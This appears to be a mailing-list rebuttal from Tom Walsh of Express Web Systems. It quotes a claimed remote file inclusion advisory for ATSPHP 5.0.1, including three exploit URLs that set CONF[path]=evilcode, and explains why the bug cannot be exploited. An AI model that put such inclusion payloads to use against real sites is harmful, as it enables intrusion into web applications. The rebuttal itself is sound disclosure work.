<snip class="drivel">
> file ;
> index.php
> sources/usercp.php
> sources/admin.php
>
> ########################################################################
>
> bugs ;
>
> require_once("{$CONF['path']}/sources/misc/classes.php");
>
>
> ########################################################################
> exp;
> /atsphp-5.0.1/index.php?CONF[path]=evilcode?
> /atsphp-5.0.1/sources/usercp.php?CONF[path]=evilcode?
> /atsphp-5.0.1/sources/admin.php?CONF[path]=evilcode?
>
> ########################################################################
>
</snip>
in the index.php the $CONF['path'] variable is overwritten on line 20,
with line 26 being the require_once() call:
$CONF['path'] = '.';
This same line also is applied in the following file(s):
ssi.php
captcha.php
button.php
install/index.php
install/upgrade.php
in the source/user_cp.php file (incorrectly noted as usercp.php):
since the referenced require_once is enclosed in a class it is
impossible to instance this class and subsequently call the
require_once() on line 29.
in the source/admin.php file:
the same applies to this file as the require_once() are encapsulated
within a class that can not be instanced.
Tom Walsh
Express Web Systems, Inc.
